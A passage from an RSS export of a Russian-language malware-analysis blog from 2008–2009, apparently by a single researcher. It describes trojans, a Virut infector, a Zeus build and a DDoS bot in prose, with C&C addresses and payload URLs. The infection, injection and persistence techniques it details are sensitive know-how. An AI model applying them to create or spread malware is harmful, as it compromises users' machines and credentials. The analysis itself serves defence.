“system.exe” и файлы, у которых есть метка зараженности (дворд по смещению -0x90 байт от конца файла равен 0xD97AB8). Из тела программы извлекается файл размером 5,5 Кб и сохраняется под именем заражаемого файла с символом “_” на конце. Этому файлу устанавливается в ресурсы иконка заражаемого файла и ставится атрибут “HIDDEN”. Затем в конец инфицируемого файла дописывается “bot2.exe” каждый байт, которого поксорен константой 0xAA, а затем получившийся файл дописывается в конец файла с символом подчеркивания на конце. Затем файл с подчеркиванием на конце имени и файл заражаемой программы удаляются. В результате получается четырехслойный “бутерброд”: первый слой (5,5 Кб) это программа, извлекающая и расшифровывающая остальные два слоя, сохраняет слои в папку TEMP и запускающая их на выполнение; второй слой это скаченный “bot2.exe” поксоренный константой 0xAA; третий слой это непосредственно сама зараженная программа поксоренная константой 0xAA; четвертый слой это служебная информация размером 0x90  байт (идентификационная константа, размеры каждого слоя и т.д.). Если скачать “bot2.exe” у программы не вышло, то второй слой просто имеет нулевой размер.&lt;br /&gt;Кроме того, заражаются и некоторые программы, если такие есть на компьютере:&lt;br /&gt;eMule&lt;br /&gt;DC++&lt;br /&gt;ApexDC++&lt;br /&gt;Cerberus FTP Server&lt;br /&gt;FileZilla Server&lt;br /&gt;Golden FTP Server&lt;br /&gt;Xlight FTP&lt;br /&gt;и заодно заражает все расшаренные папки и “Documents And Settings” других учетных записей.&lt;br /&gt;Имя файла: ggg.dll&lt;br /&gt;Размер: 22 Кб&lt;br /&gt;Time/Date Stamp (GMT): 4 февраля 2009 г. 21:55:37&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/ad365f4ff8915057b6c5bc7f8b86c3a3&quot;&gt;http://www.virustotal.com/ru/analisis/ad365f4ff8915057b6c5bc7f8b86c3a3&lt;/a&gt;&lt;br /&gt;Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt). Затем еще один слой расшифровки и создание нового потока. В новом потоке устанавливается перехват  следующих функций: &#39;InternetConnectW&#39;, &#39;HttpOpenRequestW&#39;, &#39;InternetConnectA&#39;, &#39;HttpOpenRequestA&#39;, &#39;HttpSendRequestW&#39;, &#39;HttpSendRequestA&#39;, &#39;InternetQueryDataAvailable&#39;, &#39;InternetReadFile&#39;, &#39;InternetCloseHandle&#39;, &#39;ExitProcess&#39;, &#39;FreeLibrary&#39; с последующей фильтрации трафика. Перехват делается только в пределах своего процесса, т.к. библиотека установлена как BHO. &lt;br /&gt;Кроме того, программа скачивает и запускает файл &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/grabber.exe&lt;/span&gt; . Скачиваемая программа (704 Кб) оказалась программой сбора паролей от огромного количества программ – SpotAuditor v3.7.7 (http://spotauditor.nsauditor.com)&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7UtRTKXbJTXPfYTTund5WRV4-Az9K01J3QBQWWjoXnBclqXkUjWiOH-OFXI5QsIoyI35m41wD9Mz9idagdU-A7OqB5LlZpYBd4MyQP5bFg9-CYRHHrLmXcasosEBhq7Nu9E9IXlgFOCs/s1600-h/03.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 66px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7UtRTKXbJTXPfYTTund5WRV4-Az9K01J3QBQWWjoXnBclqXkUjWiOH-OFXI5QsIoyI35m41wD9Mz9idagdU-A7OqB5LlZpYBd4MyQP5bFg9-CYRHHrLmXcasosEBhq7Nu9E9IXlgFOCs/s400/03.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5307527159716574242&quot; /&gt;&lt;/a&gt;&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/02/backdoorwin32agentadse.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jZpcRITqt4dydIP-Lo16BFwpau0kLrBAcbqr8xtR-Km2zH0BYeNBTiGIkY8C7V5lzalvvR0dSzgyNOPp6uRLcLnj5pn6uNi-36K6cu2Z0U2XipbpvlM166A7mhyYM26x3RW7f7nURO0/s72-c/02.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-3032448160041377822</guid><pubDate>Tue, 24 Feb 2009 17:41:00 +0000</pubDate><atom:updated>2009-02-24T09:48:30.166-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Infect</category><category domain="http://www.blogger.com/atom/ns#">kernel32.dll</category><category domain="http://www.blogger.com/atom/ns#">malware</category><title>Trojan.Win32.Agent.bryp</title><description>Имя файла: 111.exe&lt;br /&gt;Размер: 22,1 Кб&lt;br /&gt;Time/Date Stamp (GMT): 5 февраля 2009 г. 14:54:12&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/1f7b296f89914c531ffcb6c9e10df59b&quot;&gt;http://www.virustotal.com/ru/analisis/1f7b296f89914c531ffcb6c9e10df59b&lt;/a&gt; &lt;br /&gt;Файл не чем не запакован, написан на Visual C++ 6.0. Зачем-то читает в ветке реестра &quot;Software\Microsoft\Windows\CurrentVersion\ShellBotR&quot; ключ “Infected”. Далее извлекает и расшифровывает из себя два других исполняемых файла: имя первого генерируется случайно (12177.exe), имя второго “пустышка.exe”, сохраняет их в папку Temp и запускает на исполнение. Как и следует из имени, второй файла ничего не делает кроме вызова функции ExitProcess (размер файла 1,5 Кб).&lt;br /&gt;Имя файла: 12177.exe&lt;br /&gt;Размер: 15 Кб&lt;br /&gt;Time/Date Stamp (GMT): 3 февраля 2009 г. 12:39:13&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/9602874fe625c156ae5b21ac5fa95472&quot;&gt;http://www.virustotal.com/ru/analisis/9602874fe625c156ae5b21ac5fa95472&lt;/a&gt; &lt;br /&gt;Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt).&lt;br /&gt; Далее инициализируется импорт, расшифровывается нужные строки. Расшифровывается и сохраняется в папку System32 библиотека “Px.ax”. Затем троян читает kernel32.dll, производит модификацию функции CreateProcessW, добавляя загрузку библиотеки “Px.ax”. Оригинальная библиотека &quot;\system32\dllcache\kernel32.dll&quot; переименовывается в &quot;kbdpx.dll&quot;, а на ее место записывается модифицированный вариант. При записи новых файлов время создания и модификации устанавливается такое же как и у файла “kernel32.dll”.&lt;br /&gt;В цикле 380 раз проходит по списку запущенных процессов, ищет процесс &quot;taskmgr.exe&quot; (Диспетчер процессов), в случаи, если процесс запущен, останавливает все его потоки. Далее еще один цикл с поиском процессов &quot;explorer.exe&quot; и &quot;taskmgr.exe&quot; и остановкой их потоков. Результатом остановки потоков процесса &quot;explorer.exe&quot; будет “зависание” системы, а далее, скорее всего перезагрузка системы. &lt;br /&gt;Имя файла: Px.ax&lt;br /&gt;Размер: 12,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 3 февраля 2009 г. 12:37:21&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/fe89654a85028db84064ae58d49c31f2&quot;&gt;http://www.virustotal.com/ru/analisis/fe89654a85028db84064ae58d49c31f2&lt;/a&gt; &lt;br /&gt;Не чем не упакованная DLL. Инжектится к процессу &quot;svchost.exe&quot;  с помощью функции CreateRemoteThread. При работе создает мютекс &quot;Global\\Px.Ax&quot;. Скачивает файл: &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/bot.dll&lt;/span&gt;. Большая часть кода DLL не работает. Есть зашифрованные строки для отключения встроенного фаервола, установки в автозагрузку, URL и т.д., но все это не используется.&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-mQYS6jj0RtZyrO4cyoPeoTqfL4sGenec7TnNI_M3qyPfU0JiGLU0c4aY1fmuuULDk7K0xx-YtD7l2Ad-cBdScXq9_OhGsQB9AE_dnGnuO5NE3ymeaqrZ34UFM3luyuRilvEYnCzMvPo/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 52px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-mQYS6jj0RtZyrO4cyoPeoTqfL4sGenec7TnNI_M3qyPfU0JiGLU0c4aY1fmuuULDk7K0xx-YtD7l2Ad-cBdScXq9_OhGsQB9AE_dnGnuO5NE3ymeaqrZ34UFM3luyuRilvEYnCzMvPo/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5306420870846246066&quot; /&gt;&lt;/a&gt;&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/02/trojanwin32agentbryp.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-mQYS6jj0RtZyrO4cyoPeoTqfL4sGenec7TnNI_M3qyPfU0JiGLU0c4aY1fmuuULDk7K0xx-YtD7l2Ad-cBdScXq9_OhGsQB9AE_dnGnuO5NE3ymeaqrZ34UFM3luyuRilvEYnCzMvPo/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-269414123998497652</guid><pubDate>Fri, 06 Feb 2009 18:25:00 +0000</pubDate><atom:updated>2009-02-25T09:18:10.501-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Virut</category><title>Virus.Win32.Virut.ce</title><description>Имя файла: tcflash.exe&lt;br /&gt;Размер: 30,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 24 сентября 2007 г. 13:42:46&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/77f189044d56330a199c4b20eb25f161&quot;&gt;http://www.virustotal.com/ru/analisis/77f189044d56330a199c4b20eb25f161&lt;/a&gt; &lt;br /&gt;Файл заражен путем расширения последний секции. Переход на добавленный код осуществляется не сразу на точке входа, а спустя некоторое  число команд. Код разбавлен мусором и зашифрован. После расшифровки программа ищет базу kernall32.dll затем, по заданным хешам, ищутся нужные API функции. После этого перебираются процессы в системе, пропуская четыре первых и попадая на процесс winlogon.exe, далее производится инжект с помощью CreateRemoteThread. А вот сам код попадает в процесс winlogon.exe с помощью мэпирования секции (ZwMapViewOfSection). Далее программа копирует в процесс адреса нужных API функций.&lt;br /&gt;В инжектированном коде открывается файл “Windows\System32\Drivers\ETS\HOST” и записывается туда строка “127.0.0.1 ZieF.pl”. Прописывает процесс winlogon.exe в исключения внутреннего брандмауэра. Командный центр находится по адресу &lt;span style=&quot;font-weight:bold;&quot;&gt;http://ZieF.pl/&lt;/span&gt;, по адресу http://ZieF.pl/rc/ можно скачать PDF эксплоит.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2ILd4tJqejALmH3YlF72sT-3173UMn6NHplvqFrVbPPJ0u3xLKnl2jI5KepkoFOxriWwxsJK13PB3r7kbxKvJAjB8NMoakU2Oy4-qO2Mzp1h7ithrAC2cHTFH3tukjKnh_BoLr1B2Ww/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 59px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2ILd4tJqejALmH3YlF72sT-3173UMn6NHplvqFrVbPPJ0u3xLKnl2jI5KepkoFOxriWwxsJK13PB3r7kbxKvJAjB8NMoakU2Oy4-qO2Mzp1h7ithrAC2cHTFH3tukjKnh_BoLr1B2Ww/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5299753001649140338&quot; /&gt;&lt;/a&gt;Управление осуществляется по IRC.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb7ND1zb1F9FZALaLyM_bwOEjzMTfFcKmBzzOp63lLEabvVwqmu4r1VO9lwg0PGKwDLqvKe5FeRCx9anyzw8SVpdp5FGVFLYwHuZtxd30gavKM6XGyWvdWXrsFv9Yy4v3CXCvodS_lYwY/s1600-h/03.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 67px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb7ND1zb1F9FZALaLyM_bwOEjzMTfFcKmBzzOp63lLEabvVwqmu4r1VO9lwg0PGKwDLqvKe5FeRCx9anyzw8SVpdp5FGVFLYwHuZtxd30gavKM6XGyWvdWXrsFv9Yy4v3CXCvodS_lYwY/s400/03.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5299753004536799826&quot; /&gt;&lt;/a&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/02/win32virutnbk.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2ILd4tJqejALmH3YlF72sT-3173UMn6NHplvqFrVbPPJ0u3xLKnl2jI5KepkoFOxriWwxsJK13PB3r7kbxKvJAjB8NMoakU2Oy4-qO2Mzp1h7ithrAC2cHTFH3tukjKnh_BoLr1B2Ww/s72-c/02.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-1180238018790926282</guid><pubDate>Sun, 01 Feb 2009 15:49:00 +0000</pubDate><atom:updated>2009-06-13T11:42:05.176-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Cutwail</category><category domain="http://www.blogger.com/atom/ns#">Kobcka</category><title>Email-Worm.Win32.Agent.gfs</title><description>Имя файла: BD.exe&lt;br /&gt;Размер: 63,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 22 января 2009 г. 7:45:15&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/ce2cd829662982f3271a8c43f86cc2b8&quot;&gt;http://www.virustotal.com/ru/analisis/ce2cd829662982f3271a8c43f86cc2b8&lt;/a&gt; &lt;br /&gt;Файл не чем не запакован, нет никаких препятствующих техник. После стандартной процедуры инициализации импорта, троян создает для работы несколько мютексов с помощью которых осуществляется управление потоками трояна. Далее запускает четыре потока, которые занимаются пересылкой шифрованной информации и рассылкой на указанные адреса спама. Адрес командного центра &lt;span style=&quot;font-weight:bold;&quot;&gt;94.75.209.4&lt;/span&gt; (hosted-by.leaseweb.com).&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-ZzzPECtV9jXa2kRW98W_ZHWqNMVVpFdZHJEnJ4IIftz0Lxf1BaolXUAj-IZ7pP1o0wZKX4jFRgJfKLgfBhyphenhyphenKgwWPrIOn9lHhtr4ksM6oA3Bu-kelAYbnRPH_q5rL_urvjULNwKac3A/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 85px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-ZzzPECtV9jXa2kRW98W_ZHWqNMVVpFdZHJEnJ4IIftz0Lxf1BaolXUAj-IZ7pP1o0wZKX4jFRgJfKLgfBhyphenhyphenKgwWPrIOn9lHhtr4ksM6oA3Bu-kelAYbnRPH_q5rL_urvjULNwKac3A/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5297857054664433394&quot; /&gt;&lt;/a&gt;В коде присутствуют строки, &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXxzw_LiZKUS-vxt4SleVVRQRRnHtx4l49xKaRK0f38xIk3lWhuAJGv9Fm5CoEAmIkB8nDDvJZCZu4vOU3PfSwZlNSH5ae8FA_PfvM012vdQ36dgAadrLxM4EEH7hOfdMdFOw5L42FvlE/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 48px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXxzw_LiZKUS-vxt4SleVVRQRRnHtx4l49xKaRK0f38xIk3lWhuAJGv9Fm5CoEAmIkB8nDDvJZCZu4vOU3PfSwZlNSH5ae8FA_PfvM012vdQ36dgAadrLxM4EEH7hOfdMdFOw5L42FvlE/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5297857056027814050&quot; /&gt;&lt;/a&gt;поискав в Интернете можно найти довольно подробные описания трояна Trojan.Kobcka.&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/02/bd.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-ZzzPECtV9jXa2kRW98W_ZHWqNMVVpFdZHJEnJ4IIftz0Lxf1BaolXUAj-IZ7pP1o0wZKX4jFRgJfKLgfBhyphenhyphenKgwWPrIOn9lHhtr4ksM6oA3Bu-kelAYbnRPH_q5rL_urvjULNwKac3A/s72-c/02.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-6706518502332061215</guid><pubDate>Wed, 28 Jan 2009 17:18:00 +0000</pubDate><atom:updated>2009-01-28T09:33:00.785-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><title>Trojan-Downloader.Win32.Agent.belq</title><description>Имя файла: file.exe&lt;br /&gt;Размер: 9,98 Кб&lt;br /&gt;Time/Date Stamp (GMT): 21 января 2009 г. 10:19:48&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/2a545fef44918ac8f0d982dd25d478e8&quot;&gt;http://www.virustotal.com/ru/analisis/2a545fef44918ac8f0d982dd25d478e8&lt;/a&gt;&lt;br /&gt;Программа обильно разбавлена мусорным кодом. В начале инициализируется импорт предварительно расшифрованными (xor) строками. Далее расшифровывается основная часть программы, выполненная в виде отдельной библиотеки, копируется в специально выделенный участок памяти, производится инициализация и запускается на выполнение.&lt;br /&gt;Размер: ~16 Кб&lt;br /&gt;Time/Date Stamp (GMT): 14 декабря 2008 г. 21:56:31&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/2f3628dab95e4aa13a6797cdd8506ec3&quot;&gt;http://www.virustotal.com/ru/analisis/2f3628dab95e4aa13a6797cdd8506ec3&lt;/a&gt;&lt;br /&gt;После инициализации импорта проверяется наличие в системе сервиса ndis_ver2, в случаи, если сервис найден, файл самоудаляется. Отключается встроенный фаервол Windows. Копирует себя в USERPROFILE каталог, делает файл скрытым, ставит себя в автозагрузку в реестре “Software\Microsoft\Windows\CurrentVersion\Run”. Перебирает все процессы в системе и делает инжект своего кода. На основе уникальных данных машины (в том числе и S.M.A.R.T.), составляется идентификационная строка для данного компьютера. Далее бот передает эту строку на один из своих командных центров, программой предусмотрено наличие множества C&amp;C, которые перебираются на доступность один раз в 20 секунд, кроме того адреса хранятся не в виде строк, а в числовом виде. В данном экземпляре предусмотрено два адреса: &lt;span style=&quot;font-weight:bold;&quot;&gt;69.147.239.106&lt;/span&gt; и &lt;span style=&quot;font-weight:bold;&quot;&gt;94.103.4.217&lt;/span&gt;.&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiGHfsUONv0q4iYZa7yel-6orehbSny8o8GTKZj55ZrXnQzWAStfv4UJusbLP69MX7a4Z61EujKiesBEvIFMA0DQ5AN_s4z70BUo9PZFHHf0Tzsv8gqpg6HHJluZuFoTZGMX5T8sdFZQ/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 50px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiGHfsUONv0q4iYZa7yel-6orehbSny8o8GTKZj55ZrXnQzWAStfv4UJusbLP69MX7a4Z61EujKiesBEvIFMA0DQ5AN_s4z70BUo9PZFHHf0Tzsv8gqpg6HHJluZuFoTZGMX5T8sdFZQ/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5296398832021605922&quot; /&gt;&lt;/a&gt;Далее бот скачивает с командного центра файл и либо сохраняет его на диск в папку TEMP под именем (первые две буквы BN затем цифры) и запускает на исполнение, либо создает зомби процесс svchost.exe копирует в память скаченный файл и запускает. &lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/01/trojan-downloaderwin32agentbelq.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiGHfsUONv0q4iYZa7yel-6orehbSny8o8GTKZj55ZrXnQzWAStfv4UJusbLP69MX7a4Z61EujKiesBEvIFMA0DQ5AN_s4z70BUo9PZFHHf0Tzsv8gqpg6HHJluZuFoTZGMX5T8sdFZQ/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-3700337317475987838</guid><pubDate>Wed, 14 Jan 2009 16:29:00 +0000</pubDate><atom:updated>2009-01-14T09:30:27.017-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Zeus</category><title>Trojan-Spy.Win32.Zbot</title><description>Имя файла: ntos.exe&lt;br /&gt;Размер: 217 Кб&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/f1623f018c7827fe11eca39e0477275a&quot;&gt;http://www.virustotal.com/ru/analisis/f1623f018c7827fe11eca39e0477275a&lt;/a&gt;&lt;br /&gt;Размер файла искусственно увеличен ненужным мусором, истинный размер 41 Кб. &lt;br /&gt;С начала расшифровывается (xor 52h) небольшой кусочек кода, далее еще один (xor 7Ah), затем еще один цикл расшифровки. Далее три зашифрованные секции поочередно расшифровывается с копированием содержимого в другие секции. После вот таких “хитроумных” манипуляций мы попадаем на OEP. Как и утверждают, большинство AV программа оказалась трояном Zeus, функции которой давно описаны, а билдер и админка легко доступны в сети. Ключевые действия это инжект в winlogon.exe, перехват трафика, подмена выбранных сайтов, кража паролей, умеет делать скриншоты, крадет сертификаты и еще кое-что по мелочи. Данный билд был настроен на адрес: &lt;span style=&quot;font-weight:bold;&quot;&gt;http://hopana.info/web/cfg.bin&lt;/span&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeY3WJ_IOHfmkGxHFajNmiuJNe1V4BrFu_q6cQDvlC-6Cy3cHqBi4P-ypmNlHj0_g0O9MkNJ6CrabgoZOmVeJ7RxLH6nq1UB0ce5_Hz8B4I1TN0FnoI-IVGT4it20sbyF09ndDeByCWpM/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 36px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeY3WJ_IOHfmkGxHFajNmiuJNe1V4BrFu_q6cQDvlC-6Cy3cHqBi4P-ypmNlHj0_g0O9MkNJ6CrabgoZOmVeJ7RxLH6nq1UB0ce5_Hz8B4I1TN0FnoI-IVGT4it20sbyF09ndDeByCWpM/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5291188913118003170&quot; /&gt;&lt;/a&gt;Интересно, что билдер (Control Panel) производит не совсем стандартные действия: поиск бота в системе, предоставляет информацию о версии трояна и самое интересно производит деинсталляцию.&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXs-vJej1QzBl_WtdFZfEfkMJiyokecSyW8roZgbxjaukDH2e7THu5T1o5rFlCxe6h1TYcRfdm_uLNCzdzumjFEHTAtn7UO9X-vrDFCoHjXsvIBvl8uFpcGXF7I1uQqhMMovL5W225LtE/s1600-h/02.jpg&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 130px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXs-vJej1QzBl_WtdFZfEfkMJiyokecSyW8roZgbxjaukDH2e7THu5T1o5rFlCxe6h1TYcRfdm_uLNCzdzumjFEHTAtn7UO9X-vrDFCoHjXsvIBvl8uFpcGXF7I1uQqhMMovL5W225LtE/s400/02.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5291188917635602402&quot; /&gt;&lt;/a&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/01/ntos.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeY3WJ_IOHfmkGxHFajNmiuJNe1V4BrFu_q6cQDvlC-6Cy3cHqBi4P-ypmNlHj0_g0O9MkNJ6CrabgoZOmVeJ7RxLH6nq1UB0ce5_Hz8B4I1TN0FnoI-IVGT4it20sbyF09ndDeByCWpM/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-7345987003219797176</guid><pubDate>Mon, 29 Dec 2008 16:40:00 +0000</pubDate><atom:updated>2008-12-29T08:44:18.800-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">DDoS bot</category><category domain="http://www.blogger.com/atom/ns#">malware</category><title>Trojan-Downloader.Win32.Agent.apoa</title><description>Имя файла: nvsyst32.exe&lt;br /&gt;Размер: 3,22 Кб&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/e00e1131bbac6845be88b917ce04e6ab&quot;&gt;http://www.virustotal.com/ru/analisis/e00e1131bbac6845be88b917ce04e6ab&lt;/a&gt;&lt;br /&gt;Файл упакован WinUpack. При старте проверяет командную строку, если нет команды START, то перезапускает себя с этой командой. Далее находит адреса функций IcmpSendEcho и IcmpCreateFile. После этого ставит себя в автозагрузку. Затем определяет доступен ли Интернет, по адресам www.google.com, www.microsoft.com, www.yahoo.com. Если хоть один из них доступен, расшифровывает с помощью побайтового xor адреса своих командных центров:&lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;http://goffhouseinn.com/tmp/.images/data.php, &lt;br /&gt;http://sexygaby.com/cache/.images/data.php, &lt;br /&gt;http://nimbarka.com/tmp/.images/data.php&lt;/span&gt;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGzZFAnKSWM88oAGf3YHLmSfB57UFW5JNuI43dof7uoz7b82NDEcVT1YXXpoKAyTjg1T-QiqdTryECBZlKa83gye2GhGf8G3p-NgWoiZkgbpXye4fNoCAinf_gfldAzMcRfP3ev86YQ4/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 93px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGzZFAnKSWM88oAGf3YHLmSfB57UFW5JNuI43dof7uoz7b82NDEcVT1YXXpoKAyTjg1T-QiqdTryECBZlKa83gye2GhGf8G3p-NgWoiZkgbpXye4fNoCAinf_gfldAzMcRfP3ev86YQ4/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5285253405589642050&quot; /&gt;&lt;/a&gt;Командный центр отвечает по одному из 4 заложенных в программу сценариев. Три первых это DDOS какого-либо сайта, в первом случаи просто запрос по TCP c валидными параметрами, во втором это UDP запрос, в третьем это ping (ICMP запрос). Четвертый вариант задания это скачивание и запуск программы.&lt;br /&gt;2008, GMax&lt;br 